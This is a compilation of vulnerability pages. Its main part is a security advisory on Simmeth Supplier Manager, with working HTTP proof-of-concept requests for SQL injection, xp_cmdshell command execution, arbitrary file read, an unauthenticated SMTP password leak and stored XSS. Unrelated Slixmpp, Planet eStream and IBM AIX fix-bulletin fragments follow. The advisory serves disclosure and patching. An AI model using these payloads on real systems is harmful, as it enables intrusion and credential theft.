An issue was discovered in Simmeth Lieferantenmanager before 5.6. Due to errors in session management, an attacker can log back into a victim's account after the victim logged out - /LMS/LM/#main can be used for this. This is due to the credentials not being cleaned from the local storage after logout.

The "Supplier Manager" (Lieferantenmanager), a supply chain management tool created by Simmeth System GmbH is affected by multiple critical vulnerabilities. They allow an unauthenticated attacker to execute arbitrary code on the SQL server. Furthermore, arbitrary files can be read on the web server and user sessions can be leaked. Additionally, an attacker is able to obtain Simmeth's email password via an unauthenticated request and use it for spam campaigns.

**Vendor description**

_"We are an innovative B2B software provider for supply chain management, especially in the areas of supplier management over the entire supplier lifecycle and quality control, supply chain key figures and reporting. Our medium-sized family business is a reliable, practice-oriented partner with an extraordinary wealth of experience: since 2002, our currently more than 70 medium-sized and corporate customers have trusted our solutions and our pragmatically oriented expertise."_

Source: www.simmeth.net/en/company/about-us

**Business recommendation**

The vendor provides a patch which should be installed immediately.

An in-depth security analysis performed by security professionals is highly advised, to identify and resolve potential further critical security issues.    

**Vulnerability overview/description****1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)**

An attacker can inject raw SQL queries. By activating MSSQL features, the attacker is able to execute arbitrary commands on the MSSQL server.

**2) Faulty API Design (CVE-2022-44014)**

A faulty API design allows an attacker to fetch arbitrary SQL tables per design. This will leak all user passwords and MSSQL hashes.

**3) Local File Access (CVE-2022-44016)**

An attacker can download arbitrary files from the web server by abusing an API call.

**4) Leak of Simmeth's SMTP password**

A cleartext password for the email account "LM@simmeth.net" is leaked during the login process.

**5) Stored Cross-Site Scripting (CVE-2022-44012)**

An attacker can execute JavaScript code in the browser of the victim if a site is loaded. The victim's encrypted password can be stolen and most likely be decrypted.

**6) Authentication Bypass (CVE-2022-44013)**

An attacker can access multiple API calls without authentication. Thus, all outlined attacks can be executed without knowing any valid credentials.

**7) Errors in Session management (CVE-2022-44017)**

Due to errors in the session management, an attacker can log back into a victim's account after the victim logged out. This is due to the credentials not being cleaned from the local storage after logout.

**8) Information Disclosure**

Multiple requests were giving verbose error messages. This helps an attacker in finding and abusing a vulnerability.

**Proof of concept****1) SQL Injection leading to Remote Code Execution (CVE-2022-44015)**

Following API call can be used to execute arbitrary SQL queries via a subquery or stacked query in the table name. Because of vulnerability 6, only a valid username is required to send the request.

    POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1 
    Content-Length: 1264 
    [...] 
     
    { 
      "Credential": { 
        "Mandant": { 
          "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", 
          "ConnectionString": { 
            "Available": false, 
            "System": "****" 
          }, 
          "Encryption": 1, 
          "IsWithRegistration": true, 
          "Name": "****" 
        }, 
        "Username": "simmeth", 
        "System": "****" 
      }, 
      "ResultTab": { 
        "AutoLoad": false, 
        "Createable": true, 
        "Databases": [ 
          { 
            "System": "****", 
            "Tables": [ 
              { 
                "Columns": [], 
                "Name": "(SELECT name, password_hash FROM master.sys.sql_logins)sub;--",
                "Relations": [], 
                "Results": [ 
                  { 
                    "ColumnName": "*" 
                  } 
                ] 
              } 
            ] 
          } 
        ], 
        "Name": "Results", 
        "PageSize": 2000 
      }, 
      "Ids": {}, 
      "SecondaryIds": {}, 
      "Constraints": [], 
      "DateConstraints": {}, 
      "LogicOperator": 0, 
      "PageNumber": 0, 
      "Sortings": {}, 
      "TableFilters": {}, 
      "GroupByField": null, 
      "Aggregates": {}, 
      "isExport": false 
    }  

The POC above shows an example subquery, which will respond with the resulting dataset. Stacked queries will be executed, however, the results will not be contained in the web server's reply. The example query will dump the MSSQL password hashes.

Further attacks include arbitrary file read with the following query:

    (SELECT * FROM OPENROWSET(BULK N'c:/windows/system32/license.rtf', SINGLE_CLOB) AS Contents 
    )sub;-- 

And code execution via the xp\_cmdshell extended procedure:

    (SELECT @@Version AS version )sub; EXEC ('sp_configure ''show advanced options'', 1; 
    RECONFIGURE;'); EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;');EXEC xp_cmdshell 
    'nslookup some.domain';-- 

**2) Faulty API Design (CVE-2022-44014)**

The API design allows the frontend to supply an arbitrary table name (called <TABLE NAME HERE> in the POC below) into the following request. Because of vulnerability 6, only a valid username is required to send the request. 

    POST /DS/LM_API/api/SelectionService/GetPaggedTab HTTP/1.1 
    Content-Length: 1264 
    [...] 
     
    { 
      "Credential": { 
        "Mandant": { 
          "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", 
          "ConnectionString": { 
            "Available": false, 
            "System": "****" 
          }, 
          "Encryption": 1, 
          "IsWithRegistration": true, 
          "Name": "****" 
        }, 
        "Username": "simmeth", 
        "System": "****" 
      }, 
      "ResultTab": { 
        "AutoLoad": false, 
        "Createable": true, 
        "Databases": [ 
          { 
            "System": "****", 
            "Tables": [ 
              { 
                "Columns": [], 
                "Name": "<TABLE NAME HERE>",
                "Relations": [], 
                "Results": [ 
                  { 
                    "ColumnName": "*" 
                  } 
                ] 
              } 
            ] 
          } 
        ], 
        "Name": "Results", 
        "PageSize": 2000 
      }, 
      "Ids": {}, 
      "SecondaryIds": {}, 
      "Constraints": [], 
      "DateConstraints": {}, 
      "LogicOperator": 0, 
      "PageNumber": 0, 
      "Sortings": {}, 
      "TableFilters": {}, 
      "GroupByField": null, 
      "Aggregates": {}, 
      "isExport": false 
    }  
    

This is a fault by design, as the attacker has full control of the table name. Therefore, an arbitrary table such as the user table (ACL\_Benutzer\_Admin\_Einkauf and ACL\_Benutzer) can be read.

**3) Local File Access (CVE-2022-44016)**

The "GetImages" API call can be abused to read arbitrary files from the file system. This is due to the API allowing to set the image path from the frontend.

By pointing the base path to C:\\, all files can be accessed. Because of vulnerability 6, the request requires no credentials. 

    POST /DS/LM_API/api/ConfigurationService/GetImages HTTP/1.1 
    Content-Length: 229 
    [...] 
     
    {"Credential":{ 
    "Mandant":{ 
    "ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml" 
    }, 
    }, 
    "ImagesPath":"C:\\", 
    "ListImageNames":[ 
            "Windows\\win.ini", 
            "boot.ini", 
            "Windows\\system32\\eula.txt", 
            "Windows\\System32\\drivers\\etc\\hosts" 
    ] 
    }

The files are returned base64 encoded. Thus, even binary data can be extracted from the server.

**4) Leak of Simmeth's SMTP password**

The following API call will return the current configuration. The configuration seems to contain cleartext credentials from Simmeth's SMTP server. The request does not require any credentials.

    POST /DS/LM_API/api/ConfigurationService/GetConfiguration HTTP/1.1 
    Content-Length: 70 
    Content-Type: application/json 
     
     
    { 
    "Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml",} 
    }

The server responds with:

    [...] 
    "KPIIntro":{ 
    "IsAccessLog":true, 
    "MailSettings":{ 
    "Host":"vwp4261.webpack.hosteurope.de", 
    "IsAuthentification":true, 
    "IsSSL":false, 
    "LoginName":"wp10481666-supply", 
    "Password":"K***********a", 
    "Port":"25", 
    "Sender":"LM@simmeth.net" 
    [...]

Thus, an attacker could send phishing mails from an official Simmeth account.

**5) Stored Cross-Site Scripting (CVE-2022-44012)**

The following request can be used to store JavaScript code into the database. It will be fetched and executed in the victim's browser, once the site is visited. Because of vulnerability 6, only a valid username is required to send the request. 

    POST /DS/LM_API/api/SelectionService/InsertQueryWithActiveRelationsReturnId HTTP/1.1 
    Content-Length: 3311 
     
    {"Credential":{"Mandant":{"ConfigPath":"C:\\SSG\\50_Konfigurationen\\LM.xml","ConnectionString
    ":{"Available":false,"System":"****"},"Encryption":1,"IsWithRegistration":true,"Name":"****"},
    "Username":"********","System":"****"},"TabName":"Lieferzeiten","System":"****","TableName"
    :"Lieferzeiten","Columns":{"Artikel":"test","Lieferzeit":"test1","Bemerkung":"<img src=x 
    onerror=alert(document.domain)>test","Lie_ID":4167},
    [...]

The XSS can be used to steal the encrypted passwords from the local storage. As the API uses cleartext passwords with every request, it is most likely possible to exfiltrate the passwords in cleartext as well.

**6) Authentication Bypass (CVE-2022-44013)**

All API calls start by supplying the Credential Object.

    "Credential": { 
        "Mandant": { 
          "ConfigPath": "C:\\SSG\\50_Konfigurationen\\LM.xml", 
          "ConnectionString": { 
            "Available": false, 
            "System": "****" 
          }, 
          "Encryption": 1, 
          "IsWithRegistration": true, 
          "Name": "****" 
        }, 
        "Username": "simmeth", 
        "Password: "*********"
        "System": "****" 
      },
    

However, the password can just be removed. It seems to be only checked on the login API call. Thus, all requests can be made with just a username. The tested environment contained a User called "simmeth". Most likely this is a default user and thus always available, lowering the requirements for authenticated requests even further.

**7) Errors in Session management (CVE-2022-44017)**

An attacker can abuse a session management vulnerability in order to log back into a user account after the user logged out. The encrypted password and username saved in the local storage of the web browser is not cleared on logout and always stays valid. Hence, only the state of the frontend state changes and the user appears to be logged out. An attacker can force the frontend state back into the logged in state by visiting:

    https: //<your-host>/LMS/LM/#main

**8) Information Disclosure**

The application replies with verbose error messages, when triggering exceptions. This can help an attacker to gain knowledge about the backend and aid in the development of exploits. Entering e.g. a single apostrophe into the table name of vulnerability 2 will cause the web server to print a full stack trace as well as the rest of the SQL query. Hence, the SQL statement can easily be updated to execute properly.

**Vulnerable / tested versions**

The test was conducted in version 5.4 which was found to be vulnerable.

**Vendor contact timeline**

**Solution**

The vendor provides a patched version 5.6 which fixes the identified security issues. Please approach your vendor support contact in order to receive the patches.

**Workaround**

None

**Advisory URL**

https://sec-consult.com/vulnerability-lab/

EOF Steffen Robertz / @2022

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-44017: Multiple Critical Vulnerabilities in Simmeth System GmbH Supplier Manager (Lieferantenmanager)

Slixmpp before 1.8.3 lacks SSL Certificate hostname validation in XMLStream, allowing an attacker to pose as any server in the eyes of Slixmpp.

**Commits on Aug 28, 2022**

**Commits on Jul 12, 2022**

**Commits on Jul 11, 2022**

**Commits on Jun 22, 2022**

1.  Fix delayed reconnect after DNS failure
    
    The XML stream will re-schedule a reconnect on socket errors, except
    for DNS failures. If a user has no uplink connection, then DNS will
    also fail, preventing an automatic reconnection.
    
    This patch consolidates the two code paths and sets a maximum back-off
    time of 5min (300s).
    
    ge0rg committed
    
    Jun 22, 2022
    

**Commits on Apr 5, 2022**

**Commits on Apr 4, 2022**

**Commits on Apr 1, 2022**

**Commits on Mar 18, 2022**

**Commits on Feb 16, 2022**

**Commits on Feb 15, 2022**

**Commits on Jan 3, 2022**

**Commits on Dec 28, 2021**

**Commits on Dec 13, 2021**

**Commits on Nov 18, 2021**

**Commits on Jul 5, 2021**

**Commits on Jul 3, 2021**

**Commits on Jun 28, 2021**

**Commits on May 2, 2021**

**Commits on Apr 30, 2021**

**Commits on Apr 22, 2021**

**Commits on Apr 18, 2021**

**Commits on Apr 12, 2021**

**Commits on Apr 9, 2021**

**Commits on Apr 8, 2021**

**Commits on Feb 25, 2021**

**Commits on Feb 24, 2021**

**Commits on Feb 20, 2021**

**Commits on Feb 5, 2021**

**Commits on Feb 4, 2021**

CVE-2022-45197: History for slixmpp/xmlstream/xmlstream.py - poezio/slixmpp

In Planet eStream before 6.72.10.07, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username.

CVE-2022-45892: Multiple critical vulnerabilities in Planet Enterprises Ltd - Planet eStream

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX perfstat kernel extension to cause a denial of service. IBM X-Force ID: 239169.

**Remediation/Fixes**

**A. APARS**

IBM has assigned the following APARs to this problem:

For the kernel:

AIX Level

APAR

SP

7.1.5

IJ43967

SP11

7.2.5

IJ43869

SP06

7.3.0

IJ43875

SP03

7.3.1

IJ44594

SP02

VIOS Level

APAR

SP

3.1.2

IJ43995

3.1.2.50

3.1.3

IJ43869

3.1.3.30

3.1.4

IJ43869

3.1.4.20

For the CAA kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43099

SP11

7.2.5

IJ41975

SP06

7.3.0

IJ42938

SP03

VIOS Level

APAR

SP

3.1.2

IJ44115

3.1.2.50

3.1.3

IJ41975

3.1.3.30

For the NFS kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43072

SP11

7.2.5

IJ42159

SP06

7.3.0

IJ43468

SP03

VIOS Level

APAR

SP

3.1.2

IJ43674

3.1.2.50

3.1.3

IJ43314

3.1.3.30

For the TCP/IP kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43098

SP11

7.2.5

IJ41974

SP06

7.3.0

IJ42937

SP03

VIOS Level

APAR

SP

3.1.2

IJ43598

3.1.2.50

3.1.3

IJ43217

3.1.3.30

For the perfstat kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43970

SP11

7.2.5

IJ43876

SP06

7.3.0

IJ43891

SP03

7.3.1

IJ44595

SP02

VIOS Level

APAR

SP

3.1.2

IJ44114

3.1.2.50

3.1.3

IJ43876

3.1.3.30

3.1.4

IJ43876

3.1.4.20

For the pfcdd kernel extension:

AIX Level

APAR

SP

7.1.5

IJ43980

SP11

7.2.5

IJ43877

SP06

7.3.0

IJ43893

SP03

VIOS Level

APAR

SP

3.1.2

IJ44116

3.1.2.50

3.1.3

IJ43877

3.1.3.30

Subscribe to the APARs here:

https://www.ibm.com/support/pages/apar/\[APAR Number\]

By subscribing, you will receive periodic email alerting you to the status of the APAR, and a link to download the fix once it becomes available.

**B. FIXES**

IBM strongly recommends addressing the vulnerability now.

AIX and VIOS fixes are available.

An LPAR system reboot is required to complete the iFix installation, or Live Update may be used on AIX 7.2 and 7.3 to avoid a reboot.

The AIX and VIOS fixes can be downloaded via ftp or http from:

ftp://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

http://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

https://aix.software.ibm.com/aix/efixes/security/kernel\_fix5.tar

The link above is to a tar file containing this signed advisory, fix packages, and OpenSSL signatures for each package. The fixes below include prerequisite checking. This will enforce the correct mapping between the fixes and AIX Technology Levels.

For the kernel:

AIX Level

Interim Fix

7.1.5.8

IJ43967m8a.221110.epkg.Z

7.1.5.9

IJ43967m9a.221102.epkg.Z

7.1.5.9

IJ43967m9b.221111.epkg.Z

7.1.5.10

IJ43967mAa.221024.epkg.Z

7.2.5.3

IJ43869m3a.221025.epkg.Z

7.2.5.3

IJ43869m3b.221212.epkg.Z

7.2.5.4

IJ43869m4a.221017.epkg.Z

7.2.5.5

IJ43869s5a.221212.epkg.Z

7.3.0.1

IJ43875m1a.221025.epkg.Z

7.3.0.2

IJ43875m2a.221017.epkg.Z

7.3.1.1

IJ44594s1a.221212.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43967m9a is for AIX 7100-05-09 with bos.mp64 fileset level 7.1.5.45.

IJ43967m9b is for AIX 7100-05-09 with bos.mp64 fileset level 7.1.5.44.

IJ43869m3a is for AIX 7200-05-03 with bos.mp64 fileset level 7.2.5.103.

IJ43869m3b is for AIX 7200-05-03 with bos.mp64 fileset level 7.2.5.101.

Please reference the Affected Products and Version section above for help with checking installed fileset levels.

VIOS Level

Interim Fix

3.1.2.21

IJ43995m2b.221027.epkg.Z

3.1.2.30

IJ43995m2c.221212.epkg.Z

3.1.2.40

IJ43995m2a.221025.epkg.Z

3.1.3.10

IJ43869m3b.221212.epkg.Z

3.1.3.14

IJ43869m3a.221025.epkg.Z

3.1.3.21

IJ43869m4a.221017.epkg.Z

3.1.4.10

IJ43869s5a.221212.epkg.Z

For the CAA kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43099m8a.221110.epkg.Z

7.1.5.9

IJ43099m9a.221102.epkg.Z

7.1.5.9

IJ43099m9b.221213.epkg.Z

7.1.5.10

IJ43099sAa.221024.epkg.Z

7.2.5.3

IJ41975m3a.221027.epkg.Z

7.2.5.3

IJ41975m3b.221212.epkg.Z

7.2.5.4

IJ41975s4a.221017.epkg.Z

7.3.0.1

IJ42938m1a.221027.epkg.Z

7.3.0.2

IJ42938s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43099m9a is for AIX 7100-05-09 with bos.cluster.rte fileset level 7.1.5.38.

IJ43099m9b is for AIX 7100-05-09 with bos.cluster.rte fileset level 7.1.5.37.

IJ41975m3a is for AIX 7200-05-03 with bos.cluster.rte fileset level 7.2.5.101.

IJ41975m3b is for AIX 7200-05-03 with bos.cluster.rte fileset level 7.2.5.100.

VIOS Level

Interim Fix

3.1.2.21

IJ44115m2a.221102.epkg.Z

3.1.2.30

IJ44115m2a.221102.epkg.Z

3.1.2.40

IJ44115m2b.221213.epkg.Z

3.1.3.10

IJ41975m3b.221212.epkg.Z

3.1.3.14

IJ41975m3a.221027.epkg.Z

3.1.3.21

IJ41975s4a.221017.epkg.Z

For the NFS kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43072s8a.221110.epkg.Z

7.1.5.9

IJ43072sAa.221024.epkg.Z

7.1.5.10

IJ43072sAa.221024.epkg.Z

7.2.5.3

IJ42159s3a.221025.epkg.Z

7.2.5.3

IJ42159s3b.221213.epkg.Z

7.2.5.4

IJ42159s4a.221017.epkg.Z

7.3.0.1

IJ43468s1a.221025.epkg.Z

7.3.0.2

IJ43468s2a.221017.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7200-05-03.

IJ42159s3a is for AIX 7200-05-03 with bos.adt.include fileset level 7.2.5.102.

IJ42159s3b is for AIX 7200-05-03 with bos.adt.include fileset level 7.2.5.101.

VIOS Level

Interim Fix

3.1.2.21

IJ43674s2b.221027.epkg.Z

3.1.2.30

IJ43674s2c.221213.epkg.Z

3.1.2.40

IJ43674s2c.221213.epkg.Z

3.1.3.10

IJ42159s3b.221213.epkg.Z

3.1.3.14

IJ42159s3a.221025.epkg.Z

3.1.3.21

IJ42159s4a.221017.epkg.Z

For the TCP/IP kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43098s8a.221110.epkg.Z

7.1.5.9

IJ43098s9a.221102.epkg.Z

7.1.5.9

IJ43098s9b.221213.epkg.Z

7.1.5.10

IJ43098sAa.221024.epkg.Z

7.2.5.3

IJ41974s3a.221025.epkg.Z

7.2.5.3

IJ41974s3b.221213.epkg.Z

7.2.5.4

IJ41974s4a.221017.epkg.Z

7.3.0.1

IJ42937s1a.221027.epkg.Z

7.3.0.2

IJ42937s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7100-05-09 and 7200-05-03.

IJ43098s9a is for AIX 7100-05-09 with bos.net.tcp.client fileset level 7.1.5.40.

IJ43098s9b is for AIX 7100-05-09 with bos.net.tcp.client fileset level 7.1.5.39.

IJ41974s3a is for AIX 7200-05-03 with bos.net.tcp.client\_core fileset level 7.2.5.102.

IJ41974s3b is for AIX 7200-05-03 with bos.net.tcp.client\_core fileset level 7.2.5.101.

VIOS Level

Interim Fix

3.1.2.21

IJ43598s2b.221027.epkg.Z

3.1.2.30

IJ43598s2d.221213.epkg.Z

3.1.2.40

IJ43598s2c.221213.epkg.Z

3.1.3.10

IJ41974s3b.221213.epkg.Z

3.1.3.14

IJ41974s3a.221025.epkg.Z

3.1.3.21

IJ41974s4a.221017.epkg.Z

For the perfstat kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43970sAa.221024.epkg.Z

7.1.5.9

IJ43970sAa.221024.epkg.Z

7.1.5.10

IJ43970sAa.221024.epkg.Z

7.2.5.3

IJ43876s3a.221025.epkg.Z

7.2.5.3

IJ43876s3b.221213.epkg.Z

7.2.5.4

IJ43876s4a.221017.epkg.Z

7.2.5.5

IJ43876s5a.221212.epkg.Z

7.3.0.1

IJ43891s2a.221018.epkg.Z

7.3.0.2

IJ43891s2a.221018.epkg.Z

7.3.1.1

IJ44595s1a.221212.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

NOTE: Multiple iFixes are provided for AIX 7200-05-03.

IJ43876s3a is for AIX 7200-05-03 with bos.perf.perfstat fileset level 7.2.5.101.

IJ43876s3b is for AIX 7200-05-03 with bos.perf.perfstat fileset level 7.2.5.100.

VIOS Level

Interim Fix

3.1.2.21

IJ44114s2a.221102.epkg.Z

3.1.2.30

IJ44114s2a.221102.epkg.Z

3.1.2.40

IJ44114s2a.221102.epkg.Z

3.1.3.10

IJ43876s3b.221213.epkg.Z

3.1.3.14

IJ43876s3a.221025.epkg.Z

3.1.3.21

IJ43876s4a.221017.epkg.Z

3.1.4.10

IJ43876s5a.221212.epkg.Z

For the pfcdd kernel extension:

AIX Level

Interim Fix

7.1.5.8

IJ43980sAa.221024.epkg.Z

7.1.5.9

IJ43980sAa.221024.epkg.Z

7.1.5.10

IJ43980sAa.221024.epkg.Z

7.2.5.3

IJ43877s3a.221025.epkg.Z

7.2.5.4

IJ43877s4a.221017.epkg.Z

7.3.0.1

IJ43893s1a.221027.epkg.Z

7.3.0.2

IJ43893s2a.221018.epkg.Z

Please note that the above table refers to AIX TL/SP level as opposed to fileset level, i.e., 7.2.5.4 is AIX 7200-05-04.

VIOS Level

Interim Fix

3.1.2.21

IJ44116s2a.221102.epkg.Z

3.1.2.30

IJ44116s2a.221102.epkg.Z

3.1.2.40

IJ44116s2a.221102.epkg.Z

3.1.3.10

IJ43877s3a.221025.epkg.Z

3.1.3.14

IJ43877s3a.221025.epkg.Z

3.1.3.21

IJ43877s4a.221017.epkg.Z

The fixes are cumulative and address previously issued AIX/VIOS kernel security bulletins with respect to SP and TL, which includes:

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory4.asc

https://www.ibm.com/support/pages/node/6619721

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory3.asc

https://www.ibm.com/support/pages/node/6558948

https://aix.software.ibm.com/aix/efixes/security/kernel\_advisory2.asc

https://www.ibm.com/support/pages/node/6483875

https://aix.software.ibm.com/aix/efixes/security/trace\_advisory.asc

https://www.ibm.com/support/pages/node/6464369

To extract the fixes from the tar file:

tar xvf kernel\_fix5.tar

cd kernel\_fix5

Verify you have retrieved the fixes intact:

The checksums below were generated using the

"openssl dgst -sha256 \[filename\]" command as the following:

openssl dgst -sha256

filename

5f14f1ce6115aaea99abc509e8f9c29d66f449e28cbdff957a78f98a0d2c1319

IJ41974s3a.221025.epkg.Z

f461d5ac0225674d0b5fd2ce0ea1314c413f73d941e3cab1df2a8e907e479c81

IJ41974s3b.221213.epkg.Z

7353aec35438c207ecd34e9efd8773f8d2cf623ff3aaf1c9b21a8c6cc6389ba3

IJ41974s4a.221017.epkg.Z

ac6aac0b2364a1dccf99133869bcf5962a30d14c44abd72985d58b070b3e7743

IJ41975m3a.221027.epkg.Z

9320a9ecad0ed683f838f484a512de20f88d281940b63e13f334dbac0e023dd1

IJ41975m3b.221212.epkg.Z

53ed081ce54eaf4a278761c7b80b72e28643d3f07a8ab54b2977652b1cfa9410

IJ41975s4a.221017.epkg.Z

dd932b380464cc89938b42bf845d08d1aee3ab6a50ca7bc57292ddda34b849be

IJ42159s3a.221025.epkg.Z

0ad3ac0184e19719156e0b1c4af6f97501a64bb3a26543ddbda27cc975c8ad76

IJ42159s3b.221213.epkg.Z

ce81ba4ce3db613bb6635ff1496c4b65a0a09c24f8f6d0dd96606bc48b420cf5

IJ42159s4a.221017.epkg.Z

4b3d56260e136ad0b4484db0d2b4dd3924a97c5bc839f80d7ea4c21c42eb3840

IJ42937s1a.221027.epkg.Z

7081ec434fa5ff2c976f935aa6b51f4f51f6641dfd6132640c73dbaea7a6c1cf

IJ42937s2a.221018.epkg.Z

6f6d8cf2b6a52f409fa29dc72ef2ada536ea67dc907769c384f88fa60a39b622

IJ42938m1a.221027.epkg.Z

581acd69242d1f86779590e5ed0734de72b6f2452a6b499dceaa8c2b4eadad7d

IJ42938s2a.221018.epkg.Z

7d5e82ac6027d9fb1b4546a1de78220af56e77b87d2b7cb744d544aa64b20c62

IJ43072s8a.221110.epkg.Z

dc281b603fe5b7d7aa79e061a60e01f7a39eaa30233b545ee760798208ac6adf

IJ43072sAa.221024.epkg.Z

c6701b36ff490220433aa81466f5a60e182ba2559e07df7fdbd986329e187e1a

IJ43098s8a.221110.epkg.Z

1aeded2670910f1aeb2c07cef08d2d6afce788e8de58794db1e93567b5dbed77

IJ43098s9a.221102.epkg.Z

3ac4dd5bc1f3688a2b73e0da29c64cbafff025e7c1a05b5008752d3c8d8b5835

IJ43098s9b.221213.epkg.Z

470310e914d030445412685cd06897804a547b6f26f5b12499c9c3012906083f

IJ43098sAa.221024.epkg.Z

dad650e7a3f3ac27cc4ca0c3df9bbb1b0dc60ca449f0127398f7c2686c4fb67f

IJ43099m8a.221110.epkg.Z

a5eef69f5ad7999aac0090c6f44f2b830ed5fe704a03650c78834300433fefd6

IJ43099m9a.221102.epkg.Z

0690a7f9c117bb685540bda389f4f4a99020a45927a5481e72256f1912b2b5a0

IJ43099m9b.221213.epkg.Z

643694ee61b99af1d32f3723c056480c752d70d2f4c824f2e02cacf1489966f4

IJ43099sAa.221024.epkg.Z

7e4791c2b339034a6e20fb2d14968a2570795e0c292a4693e79b609d7f947a49

IJ43468s1a.221025.epkg.Z

87ea6d1ce409ae51ad7e10007bf52d0531e58d921553ada09b7da4d24fbdc6ef

IJ43468s2a.221017.epkg.Z

36fb6866347a3b4499d752edfdcade8fedd683d0514bb45b356fb69b0e77243a

IJ43598s2b.221027.epkg.Z

49d5cbd9ba461b2477eade7ee16964437fc85b32ea285f747e9286f7d3c32d35

IJ43598s2c.221213.epkg.Z

fba350df9177bab36d6f869a7debc8b5d29c8a6b3a3a7216a1dd3ac50d0179b9

IJ43598s2d.221213.epkg.Z

c423961037b20a89416d095b0385fcdbc69c9fb51b005c342945d14e5aab9294

IJ43674s2b.221027.epkg.Z

e61c7a4e495cf2da86d239f84c275f52fac696880142c603477f038cdfc55df5

IJ43674s2c.221213.epkg.Z

158e99123e6a6eb8909943a3438c032ba3f06248e6da4c6402e9efd3ce3900aa

IJ43869m3a.221025.epkg.Z

7bc058cb39721fea6c11e79a45e5e2cf8501ea762169dba214be9849ddb727d8

IJ43869m3b.221212.epkg.Z

c416914cd934f8235c9c39937d70437ab1193533142412f9726dae10cc1ff6b4

IJ43869m4a.221017.epkg.Z

2cea6bd4f5e87074bb7e4999e53cc6105cbb060c0e43d65e7a00ace071fea97f

IJ43869s5a.221212.epkg.Z

e8e91cb5a7446dd7cdeafd6f22ebd007bfcb5df7151fc1cc02888ad7859a1ba4

IJ43875m1a.221025.epkg.Z

33b719eb2216776a0cafca012771db3dc1cdf7676dbb9a8d3611e24795d1d7bb

IJ43875m2a.221017.epkg.Z

cb9e693c29e1d2f33c3a304779491030fb9233a3c5a60dc116a8acef3cc349ce

IJ43876s3a.221025.epkg.Z

5f44726c3402cacf73de3e91b5b518895e1e1a0d47141855319e48dd40d81d17

IJ43876s3b.221213.epkg.Z

e7ac8b7326ea273723968938f7405c0b105ec1413cb3c4ca6db54d91e13977e3

IJ43876s4a.221017.epkg.Z

d4815878bc65ba7524718d0b75f211f7bf5e8c97ed644894843309fdc312cdaf

IJ43876s5a.221212.epkg.Z

56f4a15bd4b5c33642207323dc1d21262f7558ad7879d5fc3f8c6f5fdf020ca1

IJ43877s3a.221025.epkg.Z

466c3b4a3238e68226ff7886771ec37d0787a964b8a27dba5d01f3a51c610af4

IJ43877s4a.221017.epkg.Z

68e3dadd864733d1edd5c59228fb0d6418829689a3395396f2237f9782093110

IJ43891s2a.221018.epkg.Z

714238ea24f04de93378bf879d1ab1b1dc1592a73732bd345915b16849940c9d

IJ43893s1a.221027.epkg.Z

c3b40b12d60119453b32c1b0cd73d560c7b7755703c62bff138d986dd78c3c4c

IJ43893s2a.221018.epkg.Z

3342e50f48f0c995d4ab0ed852cbc3f782b05be4938bffddd06bdcd206fe5b13

IJ43967m8a.221110.epkg.Z

307f93cee2e4767d2cedec1c705acfbd099d7b8b32c8853bcfa18ff762a6fc1f

IJ43967m9a.221102.epkg.Z

952d2e4b8888ea3beca7fbe6841191fdd58675f3640e4018d0f9de430016c504

IJ43967m9b.221111.epkg.Z

f819756d2d2ab6094ae4744babbf9cc10d47e04484973dac44a736029e741e21

IJ43967mAa.221024.epkg.Z

e7f8b39a6df86429f9859e7e6364a37b73de53952fd8cb69a570ab6397196055

IJ43970sAa.221024.epkg.Z

51589ea00f8e6574d563e71ae33604d7b7397391482165495aa27d867926354c

IJ43980sAa.221024.epkg.Z

64a961365a68e435e35313e7bd5fda2b2f1d93c84a266e1dddfe792b3b43efdd

IJ43995m2a.221025.epkg.Z

20f41357e75da7a386de8990c92a781c32de92fbfaa6bc56eda09685dcf979ea

IJ43995m2b.221027.epkg.Z

541cee83f622844dd0c6ca50515e3d41e6a6727c7a1264ca67ca696c8c7984d1

IJ43995m2c.221212.epkg.Z

c89483dc79d4132f32bc41211696616c4707c253a4c452a2829b122d1b19db06

IJ44114s2a.221102.epkg.Z

9cb895991f8a94f66ef77985cacec5a5f7018f97dd2567f403cfb5aeb4d43f73

IJ44115m2a.221102.epkg.Z

7c5490016562d664d5d7a68ef2669407053ccb2175f8b0f13a3dd1197e1287d0

IJ44115m2b.221213.epkg.Z

82caf3050ae1ea2120e3fc6aec0e4387f51c7e8b1b28993d799dc4c7bdd066a2

IJ44116s2a.221102.epkg.Z

